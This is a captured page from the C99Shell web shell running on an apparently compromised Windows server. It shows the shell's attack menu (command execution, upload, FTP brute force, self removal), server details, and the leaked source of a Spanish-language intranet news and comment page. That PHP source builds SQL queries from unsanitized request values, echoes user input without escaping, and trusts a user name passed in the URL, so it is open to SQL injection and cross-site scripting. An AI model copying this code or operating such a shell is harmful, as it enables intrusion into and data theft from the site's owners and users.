!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Extranet\phpscripts\   drwxrwxrwx
Free 4.13 GB of 39.52 GB (10.45%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     noticiasforo1.php (20.41 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
    $user 
strtoupper($user);
    
$accion = isset($acc);
    
// 1. Adición de Clasificados
    
if ($accion == true) {
        if (
$acc == 1) {
            require(
'hoyformat.php');
            require(
'conexion3.php');
            
$query ="INSERT INTO comments VALUES('','$id_new','$fecha','$titulo','$nombre','$texto')";
            
$result mysql_query($query,$db);
        }
        if (
$acc == 2) {
            require(
'conexion3.php');
            
$query ="DELETE from comments where id=$fid";
            
$result mysql_query($query,$db);
        }
    }
?>


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>mi DAMA</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
body,td,th {
    font-family: Verdana, Arial, Helvetica, sans-serif;
    font-size: 10px;
    color: #000000;
}
body {
    background-color: #333333;
}
.Estilo5 {
    color: #FFFFFF;
    font-weight: bold;
}
a:link {
    color: #333333;
    text-decoration: none;
}
a:visited {
    color: #333333;
    text-decoration: none;
}
a:active {
    color: #FF3300;
    text-decoration: none;
}
a:hover {
    text-decoration: underline;
}
.Estilo48 {font-size: 18}
.Estilo49 {font-size: 12px}
.Estilo54 {font-family: Verdana, Arial, Helvetica, sans-serif}
.Estilo55 {font-size: 12}
.Highlight {background-color:#999999}
.Normal{background-color:#666666}
.style1 {color: #999999}
.style2 {
    color: #FFFFFF;
    font-size: 20px;
}
input {
    font-family: Verdana, Arial, Helvetica, sans-serif;
    font-size: 10px;
    color: #666666;
    background-color: #F3F3F3;
    border: 1px solid #99CCCC;
}
-->
</style>
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_preloadImages() { //v3.0
  var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
    var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
    if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}

function MM_swapImgRestore() { //v3.0
  var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}

function MM_findObj(n, d) { //v4.01
  var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
    d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
  if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
  for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
  if(!x && d.getElementById) x=d.getElementById(n); return x;
}

function MM_swapImage() { //v3.0
  var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
   if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}
//-->
</script>
<script language="JavaScript" type="text/JavaScript">
<!--

function MM_reloadPage(init) {  //reloads the window if Nav4 resized
  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>
<style type="text/css">
<!--
.tabla1 {
    border: 1px none #CCCCCC;
}
textarea {
    font-family: Verdana, Arial, Helvetica, sans-serif;
    font-size: 10px;
    color: #666666;
    border: 1px solid #99CCCC;
}
select {
    font-family: Verdana, Arial, Helvetica, sans-serif;
    font-size: 10px;
    color: #333333;
    background-color: #F3F3F3;
    border: 1px solid #66CCFF;
}
-->
</style>
<style type="text/css">
<!--
button {
    font-family: Verdana, Arial, Helvetica, sans-serif;
    font-size: 10px;
    color: #666666;
    background-color: #9FEDFD;
}
-->
</style>
</head>
<body onload="MM_preloadImages('../../../Documents%20and%20Settings/nicrey/Desktop/Nicolas%20Rey%20G/Intranet/sinestesia/MiDAMA_RO_002.jpg','../../../Documents%20and%20Settings/nicrey/Desktop/Nicolas%20Rey%20G/Intranet/sinestesia/BogBann_E05b.jpg','../../../Documents%20and%20Settings/nicrey/Desktop/Nicolas%20Rey%20G/Intranet/sinestesia/Intra_dam01b.jpg','../../../Documents%20and%20Settings/nicrey/Desktop/Nicolas%20Rey%20G/Intranet/madam/mima/atardecercosmico_02b.jpg','../../../Documents%20and%20Settings/nicrey/Desktop/Nicolas%20Rey%20G/Intranet/madam/mima/atardecercosmico_03b.jpg','../../../Documents%20and%20Settings/nicrey/Desktop/Nicolas%20Rey%20G/Intranet/madam/mima/atardecercosmico_04b.jpg','../../../Documents%20and%20Settings/nicrey/Desktop/Nicolas%20Rey%20G/Intranet/madam/mima/BogBann_D02.jpg')">
<div align="center"> </div>
<div align="center"> <a href="reqintranet.php"><img src="imadam/inicio10.jpg" width="760" height="100" border="0"></a> 
  <table width="760" border="0" cellpadding="1" cellspacing="0">
    <tr bgcolor="#666666"> 
      <td width="65" class="Normal" onmouseover="this.className='Highlight'" onmouseout="this.className='Normal'"><div align="center" class="Estilo56"><a href="reqintranet.php?user=<?php echo $user?>"><font color="#FFFFFF">INICIO</font></a></div></td>
      <td width="75" bgcolor="#CC0000" ><div align="center"><span class="Estilo56"><strong><a href="reqnoticias2.php?user=<?php echo $user?>"><font color="#FFFFFF">NOTICIAS</font></a></strong></span></div></td>
      <td width="78" bgcolor="#666666" class="Normal" onmouseover="this.className='Highlight'" onmouseout="this.className='Normal'"><div align="center"><a href="reqsistemasform2.php?user=<?php echo $user?>"><span class="Estilo56"><font color="#FFFFFF">SOPORTE</font></span></a></div></td>
      <td width="102" class="Normal" onmouseover="this.className='Highlight'" onmouseout="this.className='Normal'"><div align="center"><a href="reqlegis.php?user=<?php echo $user?>"><span class="Estilo56"><font color="#FFFFFF">LEGISLACI&Oacute;N</font></span></a></div></td>
      <td width="90" bgcolor="#666666" class="Normal" onmouseover="this.className='Highlight'" onmouseout="this.className='Normal'"><div align="center"><a href="reqdamaweb.php?user=<?php echo $user?>"><span class="Estilo56"><font color="#FFFFFF">DAMA 
          WEB</font> </span></a></div></td>
      <td width="81" class="Normal" onmouseover="this.className='Highlight'" onmouseout="this.className='Normal'"><div align="center"><a href="reqlinks.php?user=<?php echo $user?>"><span class="Estilo56"><font color="#FFFFFF">LINKS</font> 
          </span></a></div></td>
      <td width="81" bgcolor="#666666" class="Normal" onmouseover="this.className='Highlight'" onmouseout="this.className='Normal'"><div align="center"><a href="reqrediseno.php?user=<?php echo $user?>"><span class="Estilo56"><font color="#FFFFFF">REDISE&Ntilde;O</font></span></a></div></td>
      <td width="72" bgcolor="#666666" class="Normal" onmouseover="this.className='Highlight'" onmouseout="this.className='Normal'"><div align="center"><a href="reqparticipate.php?user=<?php echo $user?>"><span class="Estilo56"><font color="#FFFFFF">PARTICIPE</font></span></a></div></td>
      <td width="78" bgcolor="#666666" class="Normal" onmouseover="this.className='Highlight'" onmouseout="this.className='Normal'"><div align="center"><a href="reqindice.php?user=<?php echo $user?>"><span class="Estilo56"><font color="#FFFFFF">INDICE</font></span></a></div></td>
    </tr>
  </table>
</div>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="760">
  <tbody>
    <tr bgcolor="#FFFFFF"> 
      <td bgcolor="#CC0000">&nbsp;</td>
    </tr>
  </tbody>
</table>
<table width="760" height="276" border="0" align="center" cellpadding="0" cellspacing="20" bgcolor="#CC0000">
  <tr> 
    <td width="520" valign="top" bordercolor="#FFCC00" bgcolor="#FFFFFF"> 
      <?php
require('conexion3.php');
$consul "SELECT *
FROM news where id=
$id";
$result mysql_query($consul,$db);
$num_filas mysql_num_rows($result);
while (
$myrow mysql_fetch_array($result))
{
$idacc1 $myrow["id"];
$fechaacc1 $myrow["fecha"];
$catacc1 $myrow["cat"];
$titularacc1 $myrow["titular"];
$textoacc1 $myrow["texto"];
$descriacc1 $myrow["descri"];
$ficha $myrow["fichero"];
$foro $myrow["comments"];
//echo $ficha;
$trans $fechaacc1;
$textoa $textoacc1;
if (
$ficha == "") {
$ficha "colores/news.gif";
$h 0;
$v 0;
}else{
$h 10;
$v 10;
}

//$textoa = str_replace("\n", "<br>", $textoa);

require('fechanew.php');
}


$consul "SELECT *
            FROM catnew where catid=
$catacc1";
            
$result mysql_query($consul,$db);
            
$num_filas mysql_num_rows($result);
            while (
$myrow mysql_fetch_array($result))
            {
            
$nocx $myrow["catno"];
            }
            
            if (
$foro == 1) {
                
$alto_capa=275;
            }else{
                
$alto_capa=375;
            }
?>
      <table width="100%" border="0" cellspacing="0" cellpadding="6">
        <tr> 
          <td align="left"><table width="100%" border="0" cellspacing="0" cellpadding="16">
              <tr> 
                <td><div id="Layer1" style="position:absolute; width:491px; height:<?php echo $alto_capa?>px; z-index:1; overflow: auto; visibility: visible;"> 
                    <table width="95%" border="0" cellspacing="0" cellpadding="8">
                      <tr> 
                        <td><p><font color="#666666" size="2" face="Arial, Helvetica, sans-serif">Bogot&aacute;, 
                            <?php echo $fechapresentar?> <br>
                            </font><font size="3" face="Times New Roman, Times, serif"><strong><font size="4" face="Arial, Helvetica, sans-serif"><?php echo $titularacc1?></font></strong></font></p>
                          <p align="left"><font color="#666666" size="2" face="Verdana, Arial, Helvetica, sans-serif"><img src="<?php echo $ficha?>" hspace="<?php echo $h?>" vspace="<?php echo $v?>" align="left"><?php echo $textoa?></font></p></td>
                      </tr>
                    </table>
                    </div></td>
              </tr>
            </table></td>
        </tr>
      </table> 
      <br>
      <?php if ($foro == 1) { ?>
      <p>&nbsp;</p>
      <p>&nbsp;</p>
      <p>&nbsp;</p>
      <p>&nbsp;</p>
      <p>&nbsp;</p>
      <p>&nbsp;</p>
      <p>&nbsp;</p>
      <p>&nbsp;</p>
      <p>&nbsp;</p>
      <table width="100%" border="0" cellspacing="0" cellpadding="8">
        <tr>
          <td><table width="100%" border="0" cellspacing="0" cellpadding="8">
              <tr> 
                <td bgcolor="#6699CC">DOCUMENTOS RELACIONADOS</td>
              </tr>
              <tr> 
                <td><table width="100%" border="0" cellspacing="0" cellpadding="3">
                    <tr> 
                      <td width="50%"><font color="#0099FF">&gt;</font> <a href="../docs/indi.doc">Documento 
                        preliminar de indicadores</a></td>
                      <td width="50%"><font color="#0099FF">&gt;</font> <a href="../docs/meto.doc">Metodolog&iacute;a</a></td>
                    </tr>
                    <tr> 
                      <td width="50%"><font color="#0099FF">&gt;</font> <a href="../docs/indisalud.doc">Documento 
                        de indicadores de salud ambiental</a></td>
                      <td width="50%" valign="top"><font color="#0099FF">&gt;</font> 
                        <a href="../docs/crono.xls">Cronograma</a></td>
                    </tr>
                  </table></td>
              </tr>
            </table></td>
        </tr>
        <tr> 
          <td><form name="form1" method="post" action="">
              <table width="100%" border="0" cellspacing="0" cellpadding="8">
                <tr bgcolor="#99CCCC"> 
                  <td colspan="4"> <div align="left"><a name="uno"></a>COMENTAR 
                      ESTE TEMA</div></td>
                </tr>
                <tr> 
                  <td><div align="right">Nombre:</div></td>
                  <td><div align="left"> 
                      <input name="nombre" type="text" id="nombre2" value="<?php echo $user?>">
                    </div></td>
                  <td><div align="right">T&iacute;tulo:</div></td>
                  <td><div align="left"> 
                      <input name="titulo" type="text" id="titulo2">
                    </div></td>
                </tr>
                <tr> 
                  <td><div align="right">Comentario:</div></td>
                  <td colspan="3"><div align="left"> 
                      <textarea name="texto" cols="70" rows="3" id="textarea"></textarea>
                    </div></td>
                </tr>
                <tr> 
                  <td colspan="4"><div align="center"> 
                      <input type="submit" name="Submit" value="Enviar mi comentario">
                      <input name="acc" type="hidden" id="acc2" value="1">
                      <input name="id_new" type="hidden" id="id_new2" value="<?php echo $id?>">
                      <input name="user" type="hidden" id="user3" value="<?php echo $user?>">
                    </div></td>
                </tr>
              </table>
            </form></td>
        </tr>
        <tr> 
          <td><table width="100%" border="0" cellspacing="0" cellpadding="8">
              <tr> 
                <td bgcolor="#FFC53C"> <div align="left"><a name="dos"></a>COMENTARIOS 
                    SOBRE ESTE TEMA</div></td>
              </tr>
              <tr> 
                <td><div align="left"> 
                    <?php
                  $consul 
"SELECT *
            FROM moderador where id_new=
$id";
            
$result mysql_query($consul,$db);
            
$num_filas mysql_num_rows($result);
            while (
$myrow mysql_fetch_array($result))
            {
            
$mode $myrow["user"];
            }
                  
                  require(
'conexion3.php');
                
$consul "SELECT *
                FROM comments where id_new=
$id"
                
" order by id DESC";
                
$result mysql_query($consul,$db);
                
$num_filas mysql_num_rows($result);
                while (
$myrow mysql_fetch_array($result))
                {
                
$fid $myrow["id"];
                
$ftit $myrow["titulo"];
                
$fusu $myrow["usuario"];
                
$ftex $myrow["texto"];
                
?>
                    <p><font color="#999900"><?php echo $fusu?>,</font> <strong><?php echo $ftit?></strong> 
                      <?php if ($mode == $user) { ?>
                      (<a href="requirenew3.php?acc=2&id=<?php echo $id?>&fid=<?php echo $fid?>&user=<?php echo $user?>">x</a>) 
                      <?php ?>
                      <br>
                      <font color="#666666"><?php echo $ftex?></font></p>
                    <?php ?>
                  </div></td>
              </tr>
            </table></td>
        </tr>
      </table>
      <?php ?>
    </td>
    <td width="180" valign="top"> 
      <div align="center"> 
        <table width="100%" border="0" cellspacing="0" cellpadding="6">
          <tr bgcolor="#33CCFF"> 
            <td align="left" bgcolor="#99CCCC"><font color="#000000" size="1" face="Verdana, Arial, Helvetica, sans-serif">OTRAS 
              NOTICIAS </font></td>
          </tr>
          <tr> 
            <td align="left" bgcolor="#FEFBD3"> 
              <?php
                  
require('conexion3.php');
                
$consul "SELECT *
                FROM news where cat=9"
                
" order by fecha DESC limit 2,5";
                
$result mysql_query($consul,$db);
                
$num_filas mysql_num_rows($result);
                while (
$myrow mysql_fetch_array($result))
                {
                
$idacc1 $myrow["id"];
                
$fechaacc1 $myrow["fecha"];
                
$catacc1 $myrow["cat"];
                
$titularacc1 $myrow["titular"];
?>
              <p><a href="requirenew3.php?id=<?php echo $idacc1?>&user=<?php echo $user?>"><?php echo $titularacc1?></a> 
              </p>
              <?php ?>
            </td>
          </tr>
        </table>
        <table width="100%" border="0" cellspacing="0" cellpadding="6">
          <tr> 
            <td align="left" bgcolor="#FFC53C">BUSCAR EN NOTICIAS</td>
          </tr>
          <tr> 
            <td align="left" bgcolor="#FEFBD3"> 
              <p><font color="#000000">La siguiente forma le permitir&aacute; 
                buscar noticias por medio de texto.</font></p>
              <div id="Layer2" style="position:absolute; width:193px; height:115px; z-index:2"> 
                <form name="form2" method="post" action="reqnoticias1.php">
                  <table width="100%" border="0" cellspacing="0" cellpadding="0">
                    <tr> 
                      <td width="100%" valign="top"> <div align="left"> 
                          <font color="#000000"><input name="search" type="text" id="search" size="25">
                          <input type="submit" name="Submit2" value="Ir..">
                          <input name="user" type="hidden" id="user" value="<?php echo $user?>">
                        </font></div></td>
                    </tr>
                  </table>
                </form>
              </div>
              <p>&nbsp;</p>
              <p><font color="#000000">Esta aplicaci&oacute;n busca temporalmente 
                solo en la base de datos de noticias del DAMA</font></p></td>
          </tr>
        </table>
        <p>&nbsp;</p>
        </div></td>
  </tr>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="760">
  <tbody>
    <tr bgcolor="#003399"> 
      <td bgcolor="#CC0000" width="544"><div class="Estilo14 style1" align="center">diseño: 
          alvaro moreno - desarrollo: nicolás rey </div></td>
      <td bgcolor="#fee415" width="216"><div align="center"> 
          <p><img src="midama3_files/bogsin1yellow_sml.jpg" width="120" height="44"></p>
        </div></td>
    </tr>
  </tbody>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="760">
  <tbody>
    <tr bgcolor="#003399"> 
      <td bgcolor="#ffcc00" width="545"><div align="center"></div></td>
      <td bgcolor="#CC0000" width="215">&nbsp;</td>
    </tr>
  </tbody>
</table>
<table width="760" border="0" align="center" cellpadding="1" cellspacing="0" bgcolor="#666666">
  <tr bgcolor="#2656A2"> 
    <td width="65" class="Estilo56" onmouseover="this.className='Highlight'" onmouseout="this.className='Estilo56'"><div align="center" class="Estilo56"><a href="reqintranet.php?user=<?php echo $user?>"><font color="#FFFFFF">INICIO</font></a></div></td>
    <td width="75" bgcolor="#CC0000"><div align="center"><span class="Estilo56"><strong><a href="reqnoticias2.php?user=<?php echo $user?>"><font color="#FFFFFF">NOTICIAS</font></a></strong></span></div></td>
    <td width="78" bgcolor="#2656A2" class="Estilo56" onmouseover="this.className='Highlight'" onmouseout="this.className='Estilo56'"><div align="center"><a href="reqsistemasform2.php?user=<?php echo $user?>"><span class="Estilo56"><font color="#FFFFFF">SOPORTE</font></span></a></div></td>
    <td width="102" class="Estilo56" onmouseover="this.className='Highlight'" onmouseout="this.className='Estilo56'"><div align="center"><a href="reqlegis.php?user=<?php echo $user?>"><span class="Estilo56"><font color="#FFFFFF">LEGISLACI&Oacute;N</font></span></a></div></td>
    <td width="90" class="Estilo56" onmouseover="this.className='Highlight'" onmouseout="this.className='Estilo56'"><div align="center"><a href="reqdamaweb.php?user=<?php echo $user?>"><span class="Estilo56"><font color="#FFFFFF">DAMA 
        WEB</font> </span></a></div></td>
    <td width="81" class="Estilo56" onmouseover="this.className='Highlight'" onmouseout="this.className='Estilo56'"><div align="center"><a href="reqlinks.php?user=<?php echo $user?>"><span class="Estilo56"><font color="#FFFFFF">LINKS</font> 
        </span></a></div></td>
    <td width="81" bgcolor="#2656A2" class="Estilo56" onmouseover="this.className='Highlight'" onmouseout="this.className='Estilo56'"><div align="center"><a href="reqrediseno.php?user=<?php echo $user?>"><span class="Estilo56"><font color="#FFFFFF">REDISE&Ntilde;O</font></span></a></div></td>
    <td width="72" bgcolor="#2656A2" class="Estilo56" onmouseover="this.className='Highlight'" onmouseout="this.className='Estilo56'"><div align="center"><a href="reqparticipate.php?user=<?php echo $user?>"><span class="Estilo56"><font color="#FFFFFF">PARTICIPE</font></span></a></div></td>
    <td width="78" bgcolor="#2656A2" class="Estilo56" onmouseover="this.className='Highlight'" onmouseout="this.className='Estilo56'"><div align="center"><a href="reqindice.php?user=<?php echo $user?>"><span class="Estilo56"><font color="#FFFFFF">INDICE</font></span></a></div></td>
  </tr>
</table>
<p>&nbsp;</p>
<p>&nbsp;</p>
<div align="center"></div>
<div align="center"></div>
<p>&nbsp;</p>
<p>&nbsp;</p>
</body></html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--